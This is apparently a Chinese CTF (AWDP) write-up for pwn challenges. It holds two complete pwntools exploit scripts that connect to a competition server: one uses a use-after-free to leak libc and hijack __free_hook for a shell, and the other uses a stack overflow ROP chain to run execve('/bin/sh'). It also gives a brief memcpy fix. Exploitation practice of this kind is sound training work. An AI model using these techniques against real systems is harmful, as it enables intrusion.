AWDP的形式,FIX 的活都让队内的逆向✌去修了。
[PWN] note
简单的UAF,并且增删改查功能齐全,ubuntu20.04。但抽象的是修了十几次都没修好🤡,摆了
#!/usr/bin/python3
# pwntools driver for the "note" challenge described above (UAF in a
# create/delete/edit/show note manager, ubuntu 20.04 per the write-up).
from pwn import *
file = "./pwn"
elf = ELF(file, checksec=False)
libc = elf.libc  # pwntools picks the libc the local loader would use; the offset used later assumes the target's build
context.binary = elf
context.log_level = "DEBUG"  # every byte sent/received is logged; lower to "INFO" for a quieter run
context.terminal = ["tmux", "splitw", "-h"]
p = elf.process()  # a local process is started here and then orphaned by the reassignment below (presumably it lingers until the script ends)
ip, port = "39.106.48.123", 40019
p = remote(ip, port)  # the remote connection takes over `p`; comment out one of the two assignments to choose local vs remote
def Menu(choice):
    """Pick a menu entry: wait for the menu footer, then send the entry number."""
    selection = str(choice).encode()
    p.sendlineafter(b"5. exit", selection)
def New(sz, cont):
    """Create a note (menu option 1): answer the size prompt, then the content prompt."""
    Menu(1)
    size_field = str(sz).encode()
    p.sendlineafter(b"The size of your content: ", size_field)
    p.sendlineafter(b"content: ", cont)
def Edit(idx, sz, cont):
    """Edit note *idx* (menu option 2): index, size, then content.

    Size and content go out with sendafter (no trailing newline), unlike
    New(); presumably the program reads these fields without a line
    terminator, so keep it that way.
    """
    Menu(2)
    note_id = str(idx).encode()
    size_field = str(sz).encode()
    p.sendlineafter(b"index:", note_id)
    p.sendafter(b"The size of your content:", size_field)
    p.sendafter(b"Content:", cont)
def Delete(idx):
    """Delete note *idx* (menu option 3)."""
    Menu(3)
    note_id = str(idx).encode()
    p.sendlineafter(b"index: ", note_id)
def Show(idx):
    """Print note *idx* (menu option 4)."""
    Menu(4)
    note_id = str(idx).encode()
    p.sendlineafter(b"index: ", note_id)
def uu64():
    """Receive up to the next 0x7f byte and unpack its last six bytes as a little-endian u64.

    The six bytes are zero-padded on the right to a full eight-byte word.
    """
    received = p.recvuntil(b"\x7f")
    tail = received[-6:]
    padding = b"\x00" * (8 - len(tail))
    return u64(tail + padding)
# Walk-through of the UAF the write-up describes. The two marked steps are
# operations on an index that has already been Delete'd; a correct program
# would clear the slot on delete and refuse Show/Edit on an empty slot,
# which is the patch side of this AWDP task.
New(0x70, b'/bin/sh\x00')
New(0x500, b'a')
New(0x70, b'b')
New(0x70, b"c")
New(0x70, b'd')
Delete(1)
Show(1)  # read-after-free: the just-freed slot is still readable
leak = uu64()
libc.address = leak - 0x1ecbe0  # offset is tied to the target's libc build (ubuntu 20.04 per the write-up)
log.success("libc => %#X" % libc.address)
New(0x500, b'e')
Delete(2)
Delete(3)
Delete(4)
Edit(4, 0x8, p64(libc.sym.__free_hook))  # write-after-free: the freed slot is still writable
New(0x70, b"a") # 7
New(0x70, p64(libc.sym.system)) # 8  -- the author expects this allocation to land on __free_hook (inferred from the address written above)
# gdb.attach(p)
Delete(0)  # free of note 0 is the trigger, since free is now routed through the hook
p.interactive()
[PWN] go-note
edit功能存在栈溢出
溢出长度经过动态调试获得,0x40后就可以覆盖返回地址,然后使用syscall获得shell。调试了很久,发现本地和远程机器不一样,最后在20.04调通,需要用ret调整一下栈。
#!/usr/bin/python3
# pwntools driver for the "go-note" challenge described above (stack
# overflow in the edit function; ROP chain built from the gadget list below).
from pwn import *
file = "note"
elf = ELF(file, checksec=False)
libc = elf.libc  # unused in this script (and likely None for a statically linked Go binary -- not verified)
context.binary = elf
context.log_level = "INFO"
context.terminal = ["tmux", "splitw", "-h"]
p = elf.process()  # a local process is started here and then orphaned by the reassignment below (presumably it lingers until the script ends)
ip, port = "39.106.48.123", 45369
p = remote(ip, port)  # the remote connection takes over `p`; comment out one of the two assignments to choose local vs remote
def Menu(choice):
    """Pick a menu entry: wait for the choice prompt, then send the entry number."""
    selection = str(choice).encode()
    p.sendlineafter(b"Your choice > ", selection)
def New(cont):
    """Create a note (menu option 1) with the given content."""
    Menu(1)
    p.sendlineafter(b"Please input note content:", cont)
def Delete(idx, cont):
    """Delete note *idx* (menu option 2).

    `cont` is accepted but never sent.
    """
    Menu(2)
    note_id = str(idx).encode()
    p.sendlineafter(b"Please input note id:", note_id)
def Edit(idx, cont):
    """Replace the content of note *idx* (menu option 3)."""
    Menu(3)
    note_id = str(idx).encode()
    p.sendlineafter(b"Please input note id:", note_id)
    p.sendlineafter(b"Please input new content:", cont)
def Show(idx):
    """Print note *idx* (menu option 4)."""
    Menu(4)
    note_id = str(idx).encode()
    p.sendlineafter(b"Please input note id:", note_id)
def uu64():
    """Receive up to the next 0x7f byte and unpack its last six bytes as a little-endian u64.

    The six bytes are zero-padded on the right to a full eight-byte word.
    Defined for symmetry with the other script; not called here.
    """
    received = p.recvuntil(b"\x7f")
    tail = received[-6:]
    padding = b"\x00" * (8 - len(tail))
    return u64(tail + padding)
# sleep(1)
New(b"a")
# sleep(1)
New(b"b")
# sleep(1)
New(b"c")
# gdb.attach(p, "b *0x47F41D")
# b *0x47F41D
"""
0x0000000000404408 : pop rax ; pop rbp ; ret
0x0000000000404541 : pop rbx ; ret
0x000000000047a8fa : pop rdx ; ret
0x0000000000401032 : ret
0x000000000040316c : syscall
0x0000000000462946 : pop rdi ; setne al ; ret
0x0000000000411069 : mov rsi, rcx ; add rsp, 0x10 ; pop rbp ; ret
0x0000000000430887 : pop rcx ; adc bl, al ; xor eax, eax ; xor ebx, ebx ; ret
0x000000000044a29f : mov rdi, rbx ; add rsp, 0x18 ; pop rbp ; ret
0x000000000040453f : add al, ch ; pop rbx ; ret
"""
# Gadget addresses are absolute -- they are used below without any base
# adjustment, so a non-PIE (static) binary is assumed. Taken from the list
# above except where noted.
ret = 0x0000000000401032
syscall = 0x000000000040316C
pop_rbx_ret = 0x000000000040453F  # NOTE(review): in the list above this address is `add al, ch ; pop rbx ; ret`; the bare `pop rbx ; ret` is 0x404541. Unused by the payload.
mov_rdi_rbx_pop_ret = 0x000000000044A29F  # unused by the payload
pop_rdi_ret = 0x0000000000462946
pop_rsi_ret = 0x000000000041CAD3  # not in the list above; unused by the payload
pop_rdx_ret = 0x000000000047A8FA
pop_rax_ret = 0x0000000000404408  # also pops rbp, which is why a filler value follows each rax value below
pop_rcx_ret = 0x0000000000430887
mov_rsi_rcx = 0x0000000000411069  # adds 0x10 to rsp and pops rbp before returning; the values placed after it are consumed by that
sh_addr = 0x526EA0  # writable address the "/bin/sh" string is read into at runtime (inferred from the read() below)
# execve('/bin/sh' 0 0)
# b *0x47F41D
payload = flat(
[
# read(0, sh_addr, 0x10)  -- the original comment said 0x8, but rdx is set to 0x10 here
pop_rdx_ret,
0x10,
pop_rcx_ret,
sh_addr,
mov_rsi_rcx,
0, ret, ret, ret,
pop_rdi_ret,
0,
pop_rax_ret,
0,
0x1,
syscall,
# execve('/bin/sh', 0, 0)
pop_rcx_ret,
0,
mov_rsi_rcx,
0,
pop_rdx_ret,
0x0,
pop_rdi_ret,
sh_addr,
pop_rdx_ret,
0x0,
pop_rax_ret,
59,
0x1,
syscall,
]
)
# Stack overflow in Edit: 0x40 bytes of filler reach the saved return
# address (found by dynamic debugging, per the write-up). The defensive fix
# is to bound the copy length in edit; the `FIX:` line that follows this
# script appears to be that patch.
Edit(3, b"a" * 0x40 + payload)
# sleep(1)
p.sendline(b"/bin/sh\x00")  # consumed by the read() in the chain
# sleep(1)
p.sendline("/bin/sh\x00")  # NOTE(review): str rather than bytes (pwntools warns and encodes, depending on version); presumably a retry of the line above
p.interactive()
FIX: 将memcpy的第三个参数改为0x200就行
[PWN] protoverflow
漏洞点是memcpy没有长度校验,缓冲区溢出。
相关的符号:message.proto
不能上网,不会protobuf🤡相关的内容
还有一题 starlink 0解题,看不懂。
总结:没什么经验,应该先把漏洞给修了,而不是死磕一题。